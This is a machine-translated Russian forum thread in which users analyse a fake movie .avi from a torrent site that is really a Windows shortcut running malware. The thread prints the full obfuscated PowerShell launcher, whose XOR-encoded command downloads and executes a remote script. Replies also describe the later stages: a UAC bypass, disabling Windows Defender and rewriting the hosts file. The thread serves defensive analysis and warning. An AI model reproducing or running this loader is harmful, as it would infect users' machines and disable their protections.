У меня есть файл .avi с первого взгляда, но потом выяснил, что на самом деле это .lnk файл, но было уже поздно.
И атрибут целевого элемента этого файла C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82
Отправная точка: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
Я создал String из следующих кодов ASCII, и кажется, что это формат BASE64 Hallo World!. Мне это кажется очень запутанным, так как я не мог найти NoPr, Wind и eXEc параметры в любом месте документации Powershell, дополнительно по какой-то причине файл имел размер 700 МБ, пока я не удалил .avi значение из поля описания файла.
Вы знаете, что этот файл может попытаться сделать?
Это определенно вредоносная программа!
В основном это вредоносная программа с несколькими этапами. Пока я прошел через:
Загружает и выполняет код PowerShell из http://zvd.us/1
Загруженный код PowerShell содержит дословную копию https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1, который, похоже, является неким обходом UAC. Затем он загружает и выполняет (как администратор) командный файл.
Пакетный файл сначала пытается отключить все компоненты Защитника Windows (драйверы, запланированные задачи, записи автозапуска) и добавляет для этого групповые политики. Затем он загружает и выполняет 2 файла. Я выложу полные ссылки вирусов на файлы.
Первое, кажется, признанное вредоносное ПО. А второй - это установщик NSIS, который мне еще предстоит полностью проанализировать. Вроде заменить системы hosts файл со своим собственным, перенаправляя многие домены на 80.241.222.137 и устанавливая корневой сертификат.
@zoredache, кажется, знает толк. Он просто выполняет команду в окне с noprofile, загруженным с политикой выполнения в режиме обхода (не требует подписи кода).
Вы можете проверить следующее (я добавил 3 круглые скобки в конце, но я чувствую, что чего-то не хватает).
$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582
Не знаю, что это за код, но я думаю, что идея заключалась в том, чтобы объединить коды символов ASCII DEC в строку. Ваш "Привет, мир!" похоже, не соответствует действительности, насколько я могу судить. Для начала, в строке, которая у вас есть, намного больше символов.
http://www.asciitable.com/ предложил бы следующее:
SUB _ M N F RS ETX RS SYN SYN p [I DC3 q \ T [] J RS m G M J [S DLE p [J DLE i Z \} R
Я пошел немного дальше, так как то же самое только что произошло на компьютере моего партнера. Цель файла LNK на самом деле намного длиннее, чем то, что помещается в поле в окне свойств. С участием linkanalyzer Я получил полную цель:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')
В приведенной выше команде все до |. создает список чисел, выполняет какую-то бинарную операцию XOR для каждого из чисел, а затем объединяет результат в виде строки. Я считаю, что это способ обфускации кода. Результат:
$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
Затем это передается в ( $EnV:coMsPeC[4,24,25]-jOiN'').
COMSPEC - это интерпретатор командной строки, но я не знаю, что [4,24,25]-jOiN часть должна делать. В лучшем случае он просто загружает URL-адрес в DownloadString функция и все; в худшем случае он что-то загружает, а затем выполняет это. Я не достаточно храбр, чтобы переходить по URL.
В целом, я бы сказал, что это очень похоже на вредоносное ПО, но было бы здорово, если бы кто-то, имеющий опыт работы с PowerShell, мог прокомментировать.
Вредоносное ПО. Скрытый в
https://thepiratebay.rocks/torrent/26213608/Bohemian_Rhapsody_2018.720p.DVDRip.x264.DTS-1XBET
Нашел эту ветку через гугл. Это будут вирусы / вредоносные программы и т. Д., Которые, скорее всего, испортят ваш компьютер. Он прикреплен к различным большим файлам на PirateBay и скрывает код, который установит хлам на ваш компьютер. НЕ запускайте его. Удалить немедленно. Это в фильме PirateBay «Богемская рапсодия 2018.avi», но файл 700 мг - это просто пространство, это действительно символическая ссылка / ярлык для дерьма. Проверьте вкладку свойств.
C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG] :: join ('', ((26, 95, 77, 78, 70, 30,3, 30, 22, 22, 112,91, 73, 19,113, 92, 84,91, 93,74, 30, 109, 71, 77, 74,91,83, 16, 112, 91, 74, 16, 105, 91, 92, 125, 82